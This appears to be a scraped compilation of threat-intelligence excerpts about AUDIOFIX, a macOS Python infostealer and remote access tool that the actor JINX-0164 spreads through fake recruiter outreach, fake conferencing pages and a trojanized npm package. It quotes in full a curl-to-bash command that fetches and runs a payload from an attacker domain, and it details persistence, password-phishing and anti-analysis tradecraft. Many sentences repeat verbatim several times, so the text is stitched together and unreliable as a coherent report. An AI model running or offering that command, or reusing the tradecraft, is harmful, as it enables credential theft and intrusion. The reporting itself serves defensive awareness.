AUDIOFIX

An earlier AUDIOFIX variant was written to use Dropbox for exfiltration and as a command and control mechanism.

the stolen credentials were leveraged to access internal code distribution systems and development infrastructure.

Clicking the link triggers the download of a macOS-specific remote access tool that silently begins stealing sensitive data from the moment it runs.

On April 7, 2026, JINX-0164 conducted a supply chain operation by trojanizing version 4.9.1 of the npm package @velora-dex/sdk.

The attacks leverage fake recruitment offers and masquerade as teleconference providers or system drivers to trick victims into installing the malicious payloads.

The attacks begin with a convincingly crafted LinkedIn profile reaching out to targets under the guise of a business opportunity or a job offer. Once trust is established, victims receive a meeting invitation linked to a fake conferencing platform page designed to look like Microsoft Teams or similar services.

The primary utility is AUDIOFIX, which functions as a compiled Python information stealer.

the victim was directed to a fake help page ... that instructed them to execute the following command that would download an AUDIOFIX payload: /bin/bash -c "$( curl -fsSL https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh )"

The C2 protocol supports remote Python code execution via exec()

The page then instructs the developer to download a camera or audio patch script to resolve the issue... Once the victim runs the script, the computer fetches a stealthy second-stage implant.

the stolen credentials were leveraged to access internal code distribution systems and development infrastructure.

Specifically, AUDIOFIX collects Keychain files, browser history data, and active secure shell keys.

Persistence is then established via LaunchAgent with RunAtLoad and KeepAlive flags, masquerading as legitimate applications including Microsoft Teams

The payload disguised itself as a system audio component named coreaudiod and was saved as ChromeUpdater, launched through launchctl to establish persistence.

Password phishing: A macOS dialog box, mimicking a "System Update" prompt, requests the user's password. The malware validates the entered password against the actual system credentials using sudo -k -S pwd.

the stolen credentials were leveraged to access internal code distribution systems and development infrastructure.

Specifically, AUDIOFIX collects Keychain files, browser history data, and active secure shell keys.

Persistence is then established via LaunchAgent with RunAtLoad and KeepAlive flags, masquerading as legitimate applications including Microsoft Teams

The payload disguised itself as a system audio component named coreaudiod and was saved as ChromeUpdater, launched through launchctl to establish persistence.

The invitation included a link to a malicious domain disguised as a legitimate conferencing platform, such as Microsoft Teams. After interacting with the link, the victim executed a malicious file disguised as the meeting client.

a self-destruct capability allows operators to remotely wipe all traces: unloading the LaunchAgent, deleting persistence files, clearing logs, purging server-side data, and removing the malware binary itself.

the stolen credentials were leveraged to access internal code distribution systems and development infrastructure.

The malware includes anti-analysis checks for debuggers, virtual machines (checking CPU brand strings and manufacturer names), and code signing validation - silently exiting if analysis is detected.

Password phishing: A macOS dialog box, mimicking a "System Update" prompt, requests the user's password. The malware validates the entered password against the actual system credentials using sudo -k -S pwd.

Password phishing: A macOS dialog box, mimicking a "System Update" prompt, requests the user's password. The malware validates the entered password...

The malware also compromises active sessions from communication utilities like Slack and Discord.

The malware accomplished this by extracting cloud infrastructure secrets, such as AWS, GCP, and Azure keys, and Cloudflare API tokens, as well as version control and package management credentials.

This malicious application actively harvests sensitive credentials from local password storage vaults... Specifically, AUDIOFIX collects Keychain files

GitHub tokens were utilized to deepen the compromise and steal more secrets by exfiltrating GitHub Actions Secrets directly from CI/CD pipelines.

Password phishing: A macOS dialog box, mimicking a "System Update" prompt, requests the user's password. The malware validates the entered password against the actual system credentials using sudo -k -S pwd.

Most importantly, it extracts secret keys belonging to cloud platforms like AWS and Azure.

The malware includes anti-analysis checks for debuggers, virtual machines (checking CPU brand strings and manufacturer names), and code signing validation - silently exiting if analysis is detected.

By leveraging their access to the compromised developer endpoint, the threat actor injected the same python-based RAT, AUDIOFIX, into internal repositories to facilitate lateral movement across the target environment.

Password phishing: A macOS dialog box, mimicking a "System Update" prompt, requests the user's password. The malware validates the entered password...

AUDIOFIX is a compiled Python-based infostealer and backdoor that harvests browser credentials, cryptocurrency wallet extensions, SSH keys, cloud API tokens, and even clipboard data in real time.

Both MINIRAT and AUDIOFIX route their primary outbound communications through the datahub.ink domain.

Once the victim runs the script, the computer fetches a stealthy second-stage implant.

Upon clicking, the victim unknowingly downloaded and executed a macOS-specific malware with remote access tool (RAT) capabilities.

The threat actors then utilize specialized tools to exfiltrate these secrets automatically.

The malware overlays a fake "Network latency detected" prompt on top of a real TCC permission dialog ... granting Full Disk Access.

JINX-0164 has been targeting cryptocurrency organizations with sophisticated social engineering tactics... The campaign... uses recruitment-themed social engineering to lure developers into downloading a Python-based infostealer and remote access trojan named AUDIOFIX.